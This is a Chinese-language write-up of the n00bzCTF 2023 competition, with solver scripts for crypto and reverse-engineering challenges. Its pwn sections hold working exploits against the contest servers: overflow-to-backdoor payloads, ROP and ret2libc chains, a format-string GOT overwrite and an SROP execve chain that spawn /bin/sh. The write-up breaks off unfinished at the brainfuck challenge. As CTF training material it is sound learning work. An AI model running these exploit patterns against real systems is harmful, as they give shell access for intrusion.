[n00bzCTF 2023] CPR 最后还是差一个

news2024/11/27 1:24:23

Crypto

AES

给了java的加密原码,AES加密,有key

import javax.crypto.Cipher;
import javax.crypto.SecretKey;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.PBEKeySpec;
import javax.crypto.spec.SecretKeySpec;
import java.nio.charset.StandardCharsets;
import java.security.spec.KeySpec;
import java.util.Base64;

public class AESChallenge {
    private static final String AES_ALGORITHM = "AES";
    private static final String PBKDF2_ALGORITHM = "PBKDF2WithHmacSHA256";
    private static final int ITERATIONS = 10000;
    private static final int KEY_SIZE = 256;

    private static SecretKey generateKey(String password, byte[] salt) throws Exception {
        KeySpec spec = new PBEKeySpec(password.toCharArray(), salt, ITERATIONS, KEY_SIZE);
        SecretKeyFactory factory = SecretKeyFactory.getInstance(PBKDF2_ALGORITHM);
        SecretKey tmp = factory.generateSecret(spec);
        return new SecretKeySpec(tmp.getEncoded(), AES_ALGORITHM);
    }

    private static String encrypt(String plainText, SecretKey key) throws Exception {
        Cipher cipher = Cipher.getInstance(AES_ALGORITHM);
        cipher.init(Cipher.ENCRYPT_MODE, key);
        byte[] encryptedBytes = cipher.doFinal(plainText.getBytes(StandardCharsets.UTF_8));
        return Base64.getEncoder().encodeToString(encryptedBytes);
    }

    public static void main(String[] args) {
        String flag = "REDACTED";
        String password = "aesiseasy";
        byte[] salt = "saltval".getBytes(StandardCharsets.UTF_8);

        try {
            SecretKey key = generateKey(password, salt);
            String encryptedFlag = encrypt(flag, key);
            System.out.println("Encrypted Flag: " + encryptedFlag);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

虽然不怎么熟java,但拿原来的程序稍改一下作个解密还是可以的。然后一运行就OK了,

import javax.crypto.Cipher;
import javax.crypto.SecretKey;
import javax.crypto.SecretKeyFactory;
import javax.crypto.spec.PBEKeySpec;
import javax.crypto.spec.SecretKeySpec;
import java.nio.charset.StandardCharsets;
import java.security.spec.KeySpec;
import java.util.Base64;

public class dec {
    private static final String AES_ALGORITHM = "AES";
    private static final String PBKDF2_ALGORITHM = "PBKDF2WithHmacSHA256";
    private static final int ITERATIONS = 10000;
    private static final int KEY_SIZE = 256;

    private static SecretKey generateKey(String password, byte[] salt) throws Exception {
        KeySpec spec = new PBEKeySpec(password.toCharArray(), salt, ITERATIONS, KEY_SIZE);
        SecretKeyFactory factory = SecretKeyFactory.getInstance(PBKDF2_ALGORITHM);
        SecretKey tmp = factory.generateSecret(spec);
        return new SecretKeySpec(tmp.getEncoded(), AES_ALGORITHM);
    }

    private static String encrypt(String plainText, SecretKey key) throws Exception {
        Cipher cipher = Cipher.getInstance(AES_ALGORITHM);
        cipher.init(Cipher.ENCRYPT_MODE, key);
        byte[] encryptedBytes = cipher.doFinal(plainText.getBytes(StandardCharsets.UTF_8));
        return Base64.getEncoder().encodeToString(encryptedBytes);
    }

    private static String decrypt(String plainText, SecretKey key) throws Exception {
        Cipher cipher = Cipher.getInstance(AES_ALGORITHM);
        cipher.init(Cipher.DECRYPT_MODE, key);
		byte[] decodedb64 = Base64.getDecoder().decode(plainText);
        byte[] encryptedBytes = cipher.doFinal(decodedb64);
        return new String(encryptedBytes, "utf-8");
    }

    public static void main(String[] args) {
        String encflag = "FOqxc90aMQZydCQb2MUm5tj4kRIxxVeCDWzAANfOrr8JItHYneUHhSV0awvQIo/8E1LtfYm/+VVWz0PDK6MXp38BWHoFDorhdS44DzYj9CQ=";
        String password = "aesiseasy";
        byte[] salt = "saltval".getBytes(StandardCharsets.UTF_8);

        try {
            SecretKey key = generateKey(password, salt);
            String encryptedFlag = decrypt(encflag, key);
            System.out.println("Encrypted Flag: " + encryptedFlag);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
#Encrypted Flag: n00bz{1_d0n't_l1k3_a3s_ch4ll3ng3_d0_y0u_lik3?_41703148ed8347adbe238ffbdbaf5e16}

MaaS

一个有远端的猜flag游戏,每个字符可以猜3次,返回数字左移16位后模flag字符的结果,这些数字选择不好就会有取模后相同的,经过几次猜测得到 1,2,9对于26个字符结果都不同。

#!/usr/bin/python3
import random
from Crypto.Util.number import *
flag = open('flag.txt').read()
alpha = 'abcdefghijklmnopqrstuvwxyz'.upper()
to_guess = ''
for i in range(16):
	to_guess += random.choice(alpha)

print(to_guess)
for i in range(len(to_guess)):
	for j in range(3):
		inp = int(input(f'Guessing letter {i}, Enter Guess: '))
		guess = inp << 16
		print(guess % ord(to_guess[i]))
last_guess = input('Enter Guess: ')
if last_guess == to_guess:
	print(flag)
else:
	print('Incorrect! Bye!')
	exit()

然后去算一下就行了

from pwn import *

def guess(a,b,c):
    for i in range(65, 91):
        if (1<<16)%i == a and (2<<16)%i == b and (9<<16)%i == c:
            print(i)
            break
    
    return chr(i)


p = remote('challs.n00bzunit3d.xyz', 51081)
#p = process(['python','chall.py'])
context.log_level = 'debug'

s = ''
for i in range(16):
    p.sendlineafter(b"Guess:", b'1')
    a = int(p.recvline())
    p.sendlineafter(b"Guess:", b'2')
    b = int(p.recvline())
    p.sendlineafter(b"Guess:", b'9')
    c = int(p.recvline())
    s += guess(a,b,c)

p.sendlineafter(b'Enter Guess: ', s.encode())
print(p.recvline())


#n00bz{M0dul0_f7w_1a4d3f5c!}

RSA

这是个RSA题连接远程后会返回e,n,c,由于e=17是固定的,只要取17次然后用CRT再开17次方即可。

from pwn import *
from gmpy2 import iroot
from sage.all import *
from Crypto.Util.number import long_to_bytes

c = []
n = []
for i in range(17):
    p = remote('challs.n00bzunit3d.xyz', 2069)
    e = eval(p.recvline()[4:])
    c.append(eval(p.recvline()[5:]))
    n.append(eval(p.recvline()[4:]))
    p.close()

v = crt(c,n)
m = iroot(v,17)
print(m)
print(long_to_bytes(m[0]))
#(mpz(2970669027690104794419861589361110636027186700218438676106599190503805), True)
#b'n00bz{5m4ll_3_1s_n3v3r_g00d!}'

PWN

pwn1

前边几个都不难,赛方连名字都懒得起了,直接123。

溢出到后门

from pwn import *
p = remote('challs.n00bzunit3d.xyz', 35932)
context.log_level = 'debug'
p.sendlineafter(b'\n', b'\x00'*0x48+ p64(0x401253))
p.sendline(b'cat fla*')
p.interactive()
#n00bz{PWN_1_Cl34r3d_n0w_0nt0_PWN_2!!!}

pwn2

第2个没有直接的后门但是有system和bin/sh

from pwn import *

p = remote('challs.n00bzunit3d.xyz', 61223)
context(arch='amd64',log_level = 'debug')

elf = ELF('./pwn2')
pop_rdi = 0x401196
system = elf.plt['system']
bin_sh = 0x404090
p.sendlineafter(b'\n', b'/bin/sh\x00')
p.sendlineafter(b'\n', b'\x00'*0x28+ flat(pop_rdi+1, pop_rdi, bin_sh, system))

p.sendline(b'cat fla*')

p.interactive()
#n00bz{3xpl01t_w1th0u7_w1n_5uc355ful!}

pwn3

这个把system也没有了,溢出来是那样

from pwn import *

p = remote('challs.n00bzunit3d.xyz', 42450)
context(arch='amd64',log_level = 'debug')

elf = ELF('./pwn3')
pop_rdi = 0x401232
main = 0x4011db

p.sendlineafter(b'\n', b'\x00'*0x28+ flat(pop_rdi, elf.got['puts'], elf.sym['puts'], main))
p.recvline()

libc_base = u64(p.recvline()[:-1].ljust(8, b'\x00')) - 0x80ed0
system = libc_base + 0x50d60
bin_sh = libc_base + 0x1d8698
print(f"{libc_base = :x}")

p.sendlineafter(b'\n', b'\x00'*0x28+ flat(pop_rdi+1, pop_rdi, bin_sh, system, main))

p.sendline(b'cat fla*')

p.interactive()
#n00bz{1f_y0u_h4ve_n0th1ng_y0u_h4ve_l1bc}

strings

从名字上看是格式化字符串漏洞的题。这种题也就那么几种,根据读入数据位置来分,数据在栈内就可以随便改,不在栈内就措指针链,如果没有栈深的rbp链就找argv链。

然后就是改got表或者写rop

最多也就是数据不在栈内再改ret。

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s[104]; // [rsp+0h] [rbp-70h] BYREF
  unsigned __int64 v6; // [rsp+68h] [rbp-8h]

  v6 = __readfsqword(0x28u);
  init();
  puts("Do you love strings? ");
  fgets(s, 100, stdin);
  printf(s);
  main2();
  return v6 - __readfsqword(0x28u);
}
unsigned __int64 main2()
{
  FILE *stream; // [rsp+8h] [rbp-38h]
  char s[40]; // [rsp+10h] [rbp-30h] BYREF
  unsigned __int64 v3; // [rsp+38h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  stream = fopen("flag.txt", "r");
  fgets(s, 40, stream);
  printf("n00bz{f4k3_fl4g}");
  return v3 - __readfsqword(0x28u);
}

程序执行完printf就去执行main2然后就退出了(main2没有溢出也没有printf),

        所以第1步是造个循环。这里由于got表可写,可以把main2里的函数改为main形成循环,main2里可用的函数由于fgets,printf在main里都用,所以只能改fopen(感觉不读flag有点可惜了)

        第二步由于有个无限循环可以慢慢写,由于读入只有100字节,需要手工处理一下。fmtstr_payload自动生成的会比较长。

        这里把printf改成system,然后输入/bin/sh让他执行。

from pwn import *

#p = process('./strings')
p = remote('challs.n00bzunit3d.xyz', 7150)
context(arch='amd64', log_level='debug')

elf = ELF('./strings')

#gdb.attach(p, 'b*0x401315\nc')

#fopen->main
target = elf.got['fopen']
pay = fmtstr_payload(6,{target: elf.sym['main']})

p.sendlineafter(b'Do you love strings? \n', pay)

pay = b'%7$s....'+p64(elf.got['printf'])
p.sendlineafter(b'Do you love strings? \n', pay)
libc_base = u64(p.recv(6)+ b'\x00'*2) - 0x60770
print(f"{libc_base = :x}")

system = libc_base + 0x50d60
#pay = fmtstr_payload(6,{elf.got['printf']: system})
#print(pay)
v1 = system&0xff 
v2 = (system>>8)&0xff
v3 = (system>>16)&0xff
w2 = (v2-v1)&0xff
w3 = (v3-v2)&0xff
pay = f"%{v1}c%12$hhn%{w2}c%13$hhn%{w3}c%14$hhn".ljust(0x30,'A')
pay = pay.encode() + flat(elf.got['printf'], elf.got['printf']+1, elf.got['printf']+2)
p.sendlineafter(b'Do you love strings? \n', pay)

p.sendlineafter(b'Do you love strings? \n', b'/bin/sh\x00')


p.interactive()

ASM

代码就这么一点,一时卡住了,不知怎么处理,没能rdi

.text:0000000000401000 B8 01 00 00 00                mov     eax, 1
.text:0000000000401005 BF 01 00 00 00                mov     edi, 1                          ; fd
.text:000000000040100A 48 BE 00 20 40 00 00 00 00 00 mov     rsi, offset msg                 ; buf
.text:0000000000401014 BA 0F 00 00 00                mov     edx, 0Fh                        ; count
.text:0000000000401019 0F 05                         syscall                                 ; LINUX - sys_write
.text:000000000040101B 48 83 EC 20                   sub     rsp, 20h
.text:000000000040101F B8 00 00 00 00                mov     eax, 0
.text:0000000000401024 BF 00 00 00 00                mov     edi, 0                          ; fd
.text:0000000000401029 48 89 E6                      mov     rsi, rsp                        ; buf
.text:000000000040102C BA 00 02 00 00                mov     edx, 200h                       ; count
.text:0000000000401031 0F 05                         syscall                                 ; LINUX - sys_read
.text:0000000000401033 48 83 C4 20                   add     rsp, 20h
.text:0000000000401037 C3                            retn
.text:0000000000401037
.text:0000000000401037                               vuln endp
.text:0000000000401037
.text:0000000000401038
.text:0000000000401038                               ; =============== S U B R O U T I N E =======================================
.text:0000000000401038
.text:0000000000401038
.text:0000000000401038                               ; signed __int64 start()
.text:0000000000401038                               public _start
.text:0000000000401038                               _start proc near                        ; DATA XREF: LOAD:0000000000400018↑o
.text:0000000000401038 E8 C3 FF FF FF                call    vuln
.text:0000000000401038
.text:000000000040103D B8 3C 00 00 00                mov     eax, 3Ch ; '<'
.text:0000000000401042 BF 00 00 00 00                mov     edi, 0                          ; error_code
.text:0000000000401047 0F 05                         syscall                                 ; LINUX - sys_exit
.text:0000000000401049 C3                            retn

最后还是从名字上得到入口,文件名叫srop_me显然是用srop,也就是通过中断15恢复现场,在sigreturn里设置对应寄存器得到shell

rax通过read的返回长度得到,然后调用syscall;ret+frame

from pwn import *

#p = process('./srop_me')
p = remote('challs.n00bzunit3d.xyz', 38894)
context(arch='amd64', log_level='debug')

#gdb.attach(p, 'b*0x401031\nc')

sh_address = 0x40200f
syscall_ret = 0x401047
sys_read = 0x401000

frame=SigreturnFrame()  #pwntools集成的srop工具
frame.rax = constants.SYS_execve
frame.rdi = sh_address
frame.rsi = 0
frame.rdx = 0
frame.rip = syscall_ret

pay = b'A'*0x20+ flat(sys_read, syscall_ret) + flat(frame)

p.sendafter(b'Hello, world!!\n', pay)
p.sendafter(b'Hello, world!!\n', b'X'*15)


p.interactive()
#n00bz{SR0P_1$_s0_fun_r1ght??!}

REV

wellcome

略,flag在ida里可见

mypin 未完成

也没什么线索

ezrev

用jadx打不开的class文件,网上搜文件结构,发现主版本号的位置太大,3f改为34打开

import java.util.Arrays;

public class EZrev {
  public static void main(String[] paramArrayOfString) {
    if (paramArrayOfString.length != 1) {
      System.out.println("L");
      return;
    } 
    String str = paramArrayOfString[0];
    if (str.length() != 31) {
      System.out.println("L");
      return;
    } 
    int[] arrayOfInt1 = str.chars().toArray();
    byte b;
    for (b = 0; b < arrayOfInt1.length; b++) {
      if (b % 2 == 0) {
        arrayOfInt1[b] = (char)(arrayOfInt1[b] ^ 0x13);
      } else {
        arrayOfInt1[b] = (char)(arrayOfInt1[b] ^ 0x37);
      } 
    } 
    for (b = 0; b < arrayOfInt1.length / 2; b++) {
      if (b % 2 == 0) {
        int i = arrayOfInt1[b] - 10;
        arrayOfInt1[b] = (char)(arrayOfInt1[arrayOfInt1.length - 1 - b] + 20);
        arrayOfInt1[arrayOfInt1.length - 1 - b] = (char)i;
      } else {
        arrayOfInt1[b] = (char)(arrayOfInt1[b] + 30);
      } 
    } 
    int[] arrayOfInt2 = { 
        130, 37, 70, 115, 64, 106, 143, 34, 54, 134, 
        96, 98, 125, 98, 138, 104, 25, 3, 66, 78, 
        24, 69, 91, 80, 87, 67, 95, 8, 25, 22, 
        115 };
    if (Arrays.equals(arrayOfInt1, arrayOfInt2)) {
      System.out.println("W");
    } else {
      System.out.println("L");
    } 
  }
}

很简单的先分组异或再分组移位

a = [130, 37, 70, 115, 64, 106, 143, 34, 54, 134, 96, 98, 125, 98, 138, 104, 25, 3, 66, 78, 24, 69, 91, 80, 87, 67, 95, 8, 25, 22, 115]

for i in range(len(a)//2):
    if i%2 == 0:
        a[i],a[len(a)-1-i] = a[len(a)-1-i]+10, a[i]-20 
    else:
        a[i] -= 30 

a = [v^0x13 if i%2==0 else v^0x37 for i,v in enumerate(a)]
bytes(a)
#n00bz{r3v_1s_s0_e4zy_r1ght??!!}

zzz

这个也没啥说的,就是很麻烦z3一把梭

int __fastcall check(char *a1)
{
  if ( *a1 >> 4 != 6 )
    bye();
  if ( a1[1] != a1[2] )
    bye();
  if ( ((unsigned __int8)a1[3] | (unsigned __int8)a1[6]) != 122
    || ((unsigned __int8)a1[3] & (unsigned __int8)a1[6]) != 66 )
  {
    bye();
  }
  if ( a1[4] != a1[28] )
    bye();
  if ( a1[5] * a1[29] != 15375 )
    bye();
  if ( a1[7] + a1[6] + a1[8] != 302 || a1[6] * a1[7] - a1[8] != 10890 )
    bye();
  if ( a1[9] - a1[8] != 5 || a1[10] - a1[9] != 27 || ((unsigned __int8)a1[11] ^ (unsigned __int8)a1[10]) != 32 )
    bye();
  if ( a1[12] != a1[15] || a1[12] + a1[11] != 180 || a1[13] + a1[12] != 185 )
    bye();
  if ( a1[14] + a1[13] - a1[16] != a1[13] )
    bye();
  if ( a1[16] + a1[17] != 217 || a1[17] != a1[13] )
    bye();
  if ( a1[16] + a1[14] != 2 * a1[14] )
    bye();
  if ( a1[18] != 90 || a1[18] != a1[19] || ((unsigned __int8)(a1[20] ^ a1[19]) ^ (unsigned __int8)a1[21]) != 127 )
    bye();
  if ( ((unsigned __int8)a1[22] ^ (unsigned __int8)(a1[21] ^ a1[20])) != a1[21] )
    bye();
  if ( a1[21] != 95 || a1[24] + a1[6] != 180 )
    bye();
  if ( ~a1[23] + a1[24] != -33 )
    bye();
  if ( a1[25] != a1[9] )
    bye();
  if ( a1[26] + a1[27] != 212 )
    bye();
  if ( a1[27] != a1[28] )
    bye();
  return puts("You got it!");
}

把代码复制过来,然后作个搜索替换,然后再作些小修。最后加上头和尾

from z3 import *

a1 = [BitVec(f'a_{i}',8) for i in range(30)]
s = Solver()
for i in range(30):
    s.add(a1[i]>0x20)
    s.add(a1[i]<0x7f)

for i,v in enumerate(b'n00bz{'):
    s.add(a1[i] == v)

s.add(a1[29] == ord('}'))

s.add( a1[0] >> 4 == 6 )
s.add( a1[1] == a1[2] )
s.add( (a1[3] | a1[6]) == 122 )
s.add( a1[3] & a1[6] == 66 )
s.add( a1[4] == a1[28] )
s.add( a1[5] * a1[29] == 15375 )
s.add( a1[7] + a1[6] + a1[8] == 302 )
s.add( a1[6] * a1[7] - a1[8] == 10890 )
s.add( a1[9] - a1[8] == 5 )
s.add( a1[10] - a1[9] == 27 )
s.add( a1[11] ^ a1[10] == 32 )
s.add( a1[12] == a1[15] )
s.add( a1[12] + a1[11] == 180 )
s.add( a1[13] + a1[12] == 185 )
s.add( a1[14] + a1[13] - a1[16] == a1[13] )
s.add( a1[16] + a1[17] == 217 )
s.add(a1[17] == a1[13] )
s.add( a1[16] + a1[14] == 2 * a1[14] )
s.add( a1[18] == 90 )
s.add(a1[18] == a1[19] )
s.add((a1[20] ^ a1[19] ^ a1[21]) == 127 )
s.add( (a1[22] ^ (a1[21] ^ a1[20])) == a1[21] )
s.add( a1[21] == 95 )
s.add( a1[24] + a1[6] == 180 )
s.add( ~a1[23] + a1[24] == -33 )
s.add( a1[25] == a1[9] )
s.add( a1[26] + a1[27] == 212 )
s.add( a1[27] == a1[28] )

s.check()
d = s.model()
flag = bytes([d[a1[i]].as_long() for i in range(30)])
print(flag)
#n00bz{ZzZ_zZZ_zZz_ZZz_zzZ_Zzz}

 

VM

代码很简单的虚拟机,然后写了对应的解码程序

__int64 execute()
{
  int v0; // ecx
  int v1; // eax
  int v2; // edx
  int v3; // eax
  __int64 result; // rax
  signed int i; // [rsp+8h] [rbp-8h]
  int v6; // [rsp+8h] [rbp-8h]
  int v7; // [rsp+8h] [rbp-8h]
  int v8; // [rsp+8h] [rbp-8h]
  int v9; // [rsp+8h] [rbp-8h]
  int v10; // [rsp+8h] [rbp-8h]
  int v11; // [rsp+8h] [rbp-8h]
  int v12; // [rsp+8h] [rbp-8h]
  int v13; // [rsp+8h] [rbp-8h]
  int v14; // [rsp+8h] [rbp-8h]
  int v15; // [rsp+Ch] [rbp-4h]
  int v16; // [rsp+Ch] [rbp-4h]

  for ( i = 0; ; ++i )
  {
    result = (unsigned int)i;
    if ( (unsigned int)i > 0x1FF )
      break;
    if ( (unsigned int)program[i] > 0xE )
    {
      puts("ERROR: Unknown instruction!");
      exit(-1);
    }
    switch ( program[i] )
    {
      case 0:
        puts("NOP");
        break;
      case 1:
        v0 = program[++i];
        v1 = dword_46C0++;
        stack[v1] = r[v0];
        break;
      case 2:
        r[program[++i]] = stack[--dword_46C0];
        break;
      case 3:
        v7 = i + 1;
        v16 = program[v7];
        i = v7 + 1;
        r[v16] = r[program[i]];
        break;
      case 4:
        v6 = i + 1;
        v15 = program[v6];
        i = v6 + 1;
        r[v15] = program[i];
        break;
      case 5:
        v8 = i + 1;
        r[program[v8]] += r[program[v8 + 1]];
        i = v8 + 1;
        break;
      case 6:
        v9 = i + 1;
        r[program[v9]] -= r[program[v9 + 1]];
        i = v9 + 1;
        break;
      case 7:
        v10 = i + 1;
        r[program[v10]] *= r[program[v10 + 1]];
        i = v10 + 1;
        break;
      case 8:
        v11 = i + 1;
        r[program[v11]] /= r[program[v11 + 1]];
        i = v11 + 1;
        break;
      case 9:
        v12 = i + 1;
        r[program[v12]] ^= r[program[v12 + 1]];
        i = v12 + 1;
        break;
      case 10:
        v13 = i + 1;
        r[program[v13]] &= r[program[v13 + 1]];
        i = v13 + 1;
        break;
      case 11:
        v14 = i + 1;
        r[program[v14]] |= r[program[v14 + 1]];
        i = v14 + 1;
        break;
      case 12:
        printf("%ld\n", r[program[++i]]);
        break;
      case 13:
        v2 = getchar();
        v3 = dword_46C0++;
        stack[v3] = v2;
        break;
      case 14:
        exit(0);
    }
  }
  return result;
}

然后把解码程序删掉。这题有点坑呀,用010打开能看到

bf

 确实难住了,这里边最难的一个题(只有之一)

给的是一段brainf*ck的代码,直接运行无结果只能慢慢啃。

>->>>>>,[----------[++++++++++>>>>>,>]<]>---<+[-<+]->>>>>[<+++++++++++++++++++++
+++++++++++[>>[-]+>[-]<<-<->[>-]>[-<<[-]>>>]<<<]>+++++++++++++++++++++++++++++++
++++++++++++++++>+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++<[>->+<[>]>[<+>-]<<[<]>-]>[-]>[-<<+>>]>>>]+[-<+]-
>>>>>-------------------------------[[-]--+[-<+]-<[-]+>++[-->++]]>>>>>----------
-----------------------------------------------------[[-]--+[-<+]-<[-]+>++[-->++
]]>>>>>---------------------------------------------------------------[[-]--+[-<
+]-<[-]+>++[-->++]]>>>>>-------------------[[-]--+[-<+]-<[-]+>++[-->++]]>>>>>---
----------------------------------------[[-]--+[-<+]-<[-]+>++[-->++]]>>>>>------
--------------------------------------[[-]--+[-<+]-<[-]+>++[-->++]]>>>>>--------
--[[-]--+[-<+]-<[-]+>++[-->++]]>>>>>--------------------------------------------
-------------------[[-]--+[-<+]-<[-]+>++[-->++]]>>>>>---------------------------
-----------[[-]--+[-<+]-<[-]+>++[-->++]]>>>>>----------------[[-]--+[-<+]-<[-]+>
++[-->++]]>>>>>-----------------------------------------------------------------
----[[-]--+[-<+]-<[-]+>++[-->++]]>>>>>------------------------------------------
---------------------[[-]--+[-<+]-<[-]+>++[-->++]]>>>>>-------------------------
----------------------------------------------------------[[-]--+[-<+]-<[-]+>++[
-->++]]>>>>>----------------[[-]--+[-<+]-<[-]+>++[-->++]]>>>>>------------------
----------------------------------------------[[-]--+[-<+]-<[-]+>++[-->++]]>>>>>
-------------------------------------[[-]--+[-<+]-<[-]+>++[-->++]]>>>>>---------
-------[[-]--+[-<+]-<[-]+>++[-->++]]>>>>>---------------------------------------
------------------------------[[-]--+[-<+]-<[-]+>++[-->++]]>>>>>----------------
-----------------------------------------------[[-]--+[-<+]-<[-]+>++[-->++]]>>>>
>---------------------[[-]--+[-<+]-<[-]+>++[-->++]]>>>>>------------------------
-------------------------------------------[[-]--+[-<+]-<[-]+>++[-->++]]>>>>>---
--------------------------------------------------------------------------------
---------[[-]--+[-<+]-<[-]+>++[-->++]]>>>>>------------------------------[[-]--+
[-<+]-<[-]+>++[-->++]]>>>>>-----------------------------------------------------
-----------[[-]--+[-<+]-<[-]+>++[-->++]]>>>>>-----------------------------------
-----------------------------------[[-]--+[-<+]-<[-]+>++[-->++]]>>>>>-----------
-----[[-]--+[-<+]-<[-]+>++[-->++]]>>>>>-----------------------------------------
-----------------------[[-]--+[-<+]-<[-]+>++[-->++]]>>>>>-----------------------
-------[[-]--+[-<+]-<[-]+>++[-->++]]>>>>>----------------[[-]--+[-<+]-<[-]+>++[-
->++]]>>>>>-[[-]--+[-<+]-<[-]+>++[-->++]]>>>>>----------------------------------
-[[-]--+[-<+]-<[-]+>++[-->++]]>>>>>---------------------------------------------
------------------[[-]--+[-<+]-<[-]+>++[-->++]]>>>>>------[[-]--+[-<+]-<[-]+>++[
-->++]]>>>>>---------------------[[-]--+[-<+]-<[-]+>++[-->++]]>>>>>-------------
---[[-]--+[-<+]-<[-]+>++[-->++]]>>>>>-------------------------------------------
--------------------[[-]--+[-<+]-<[-]+>++[-->++]]>>>>>-----------------------[[-
]--+[-<+]-<[-]+>++[-->++]]>>>>>----------------[[-]--+[-<+]-<[-]+>++[-->++]]>>>>
>------------------------------------------[[-]--+[-<+]-<[-]+>++[-->++]]>>>>>---
------------------------------------------------------------[[-]--+[-<+]-<[-]+>+
+[-->++]]>>>>>------[[-]--+[-<+]-<[-]+>++[-->++]]>>>>>----------------[[-]--+[-<
+]-<[-]+>++[-->++]]>>>>>--------------------------------------------------------
-------------------------------------[[-]--+[-<+]-<[-]+>++[-->++]]>>>>>---------
------------------------------------------------------[[-]--+[-<+]-<[-]+>++[-->+
+]]>>>>>--------[[-]--+[-<+]-<[-]+>++[-->++]]>>>>>----------------[[-]--+[-<+]-<
[-]+>++[-->++]]>>>>>-------------------------------------[[-]--+[-<+]-<[-]+>++[-
->++]]>>>>>-------------------------------------------------------------------[[
-]--+[-<+]-<[-]+>++[-->++]]>>>>>------------------------------------------------
------------------------------------------[[-]--+[-<+]-<[-]+>++[-->++]]>>>>>----
--------------------------------------------------------------[[-]--+[-<+]-<[-]+
>++[-->++]]>>>>>----------------[[-]--+[-<+]-<[-]+>++[-->++]]>>>>>---[[-]--+[-<+
]-<[-]+>++[-->++]]>>>>>----------------------[[-]--+[-<+]-<[-]+>++[-->++]]>>>>>-
-------------------------------------------------------------------[[-]--+[-<+]-
<[-]+>++[-->++]]>>>>>-----------------------------------------------------------
-----------[[-]--+[-<+]-<[-]+>++[-->++]]>>>>>-----------------------------------
-------------[[-]--+[-<+]-<[-]+>++[-->++]]>>>>>---------------------------------
---------------[[-]--+[-<+]-<[-]+>++[-->++]]>>>>>-------------------------------
-----------------[[-]--+[-<+]-<[-]+>++[-->++]]>>>>>-----------------------------
-----------------[[-]--+[-<+]-<[-]+>++[-->++]]+[-<+]->+++[[-]>+++]+[-<+]-<[->[-]
<->++++++++++[>+++++++>+++++++++++>++++++++++>+++>+++++++++++>+++++++++++>++++++
+++++>+++++++++++>++++++++++++>++++>+++>+++++++++++>+++++++++++>+++++++++++>++++
+++++++>++++++++++>+++>++++++++++>++++++++++>+++++++++>++++++++++>++++>+++>+++++
++++++>+++++++++++>++++++++++++>+++>+++++++++>++++++++++>+++++++++>++++++++++>++
+++++++++>++++>+++>+++++++>+++++++++++>+++>+++++++++++>+++++++++++>+++++++++++>+
+++++>+++>++++++++++>++++++++++>++++++++++>+++>+++++>+++++[-<+]->-]>++++++>+>+++
+++++>++>+++++>+>++++>++++>+>++++>++>+++++++++>++++>+>>+++>++>++>++++++++>++++++
+>+++>++++>++>++++++>++++>+>++>+++++++>+++>+++++++>+++++>>++++++>++>+++++++++>++
++>++>>+>++++++>+++>++>+++++>>+++++++>++>++++++++>++[-<+]>>[.[-]>]]>[[-]<->+++++
+++++[>+++++++>++++++++++>+++++++++>++++++++++>+++>+++>++++++++>+++++++++++>++++
+++++++>+++>++++++++++>+++++++++++>+++++++++++>+++>++++++++++>+++++++++++>++++[-
<+]->-]>++++++++>+++++>+++++++++>+>+++>++>+++++++++>+>+++++++>++>+++>+>++++++>++
>+++++>++++++>++++[-<+]>>[.[-]>]]

手工处理一下

>-
>>>>>,[----------[++++++++++>>>>>,>]<]  #每隔5个读入1字符,直到读入0结束
>---<+[-<+]-                            #指针移到开始
>>>>>[                                  #对每个输入处理
	<++++++++++++++++++++++++++++++++p
	[>>[-]+>[-]<<-<->[>-]>[-<<[-]>>>]<<<]p  #第字符-32
	>+++++++++++++++++++++++++++++++++++++++++++++++p  #+47
	>++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++p #b1+94
	<[>->+<[>]>[<+>-]<<[<]>-]p
	>[-]p
	>[-<<+>>]p
	>>>]
p+[-<+]->>>>>-------------------------------  #密文核对 n->31 0->3f b->13 z->2b
[[-]--+[-<+]-<[-]+>++[-->++]]>>>>>---------------------------------------------------------------
[[-]--+[-<+]-<[-]+>++[-->++]]>>>>>---------------------------------------------------------------
[[-]--+[-<+]-<[-]+>++[-->++]]>>>>>-------------------
[[-]--+[-<+]-<[-]+>++[-->++]]>>>>>-------------------------------------------
[[-]--+[-<+]-<[-]+>++[-->++]]>>>>>--------------------------------------------
[[-]--+[-<+]-<[-]+>++[-->++]]>>>>>----------

大概意思差不多明白了,前边输入后5字节一个字符放入数据区,然后加密,然后跟逐个减n,估计要求最后是0,那密文这块的减号个数就是密文

为这还写了个bf的解码器

from pwn import pause 

dat = open('chall.bf', encoding='utf-8').read()

def show(val,ptr):
    print('   '*ptr + ' v')
    print(' '.join([hex(i)[2:].rjust(2) for i in val]))
def bf(msg, inp):
    i_ptr = 0      #输入数据inp指针   
    l_stack = []   #循环栈    
    fp = 0         #代码文件指针  
    val = [0]*200  #数据区
    v_ptr = 0      #数据指针
    while fp<len(msg):
        #print(fp, "{"+msg[:fp]+"}")
        #show(val,v_ptr)
        if msg[fp] == '+':
            val[v_ptr] = (val[v_ptr]+1)%256
            fp+=1
        elif msg[fp] == '-':
            val[v_ptr] = (val[v_ptr]-1)%256
            fp+=1
        elif msg[fp] == '>':
            v_ptr +=1
            fp +=1
        elif msg[fp] == '<':
            v_ptr -=1
            fp +=1
        elif msg[fp] == '.':   #输出
            print('out:'+chr(val[v_ptr]))
            fp +=1
        elif msg[fp] == ',':   #输入
            val[v_ptr] = inp[i_ptr]
            i_ptr +=1
            fp +=1
        elif msg[fp] == '[':
            if val[v_ptr] != 0:
                l_stack.append(fp)
            else:
                cnt = 1 
                while True:
                    fp +=1
                    if msg[fp]=='[':
                        cnt+=1 
                    elif msg[fp] == ']':
                        cnt-=1 
                    else:
                        pass 
                    if cnt==0 and msg[fp]==']':
                        break
            fp +=1
        elif msg[fp] == ']':
            v = l_stack.pop()
            if val[v_ptr] != 0:
                fp = v
            else:
                fp +=1
        elif msg[fp] == 'p' or msg[fp] == 'P':
            show(val, v_ptr)
            fp +=1
            pause()
        elif msg[fp] == '#':  #跳过本行
            while msg[fp] != '\n':
                fp+=1 
            fp +=1 
        else:
            fp +=1 


bf(dat, b'n00bz{@@@@@@@@@@@@@@@@@@@@@@@@0}\x00')

最后也没得到结果,不过知道两个加密有关的数:47,94

回过头来看密文

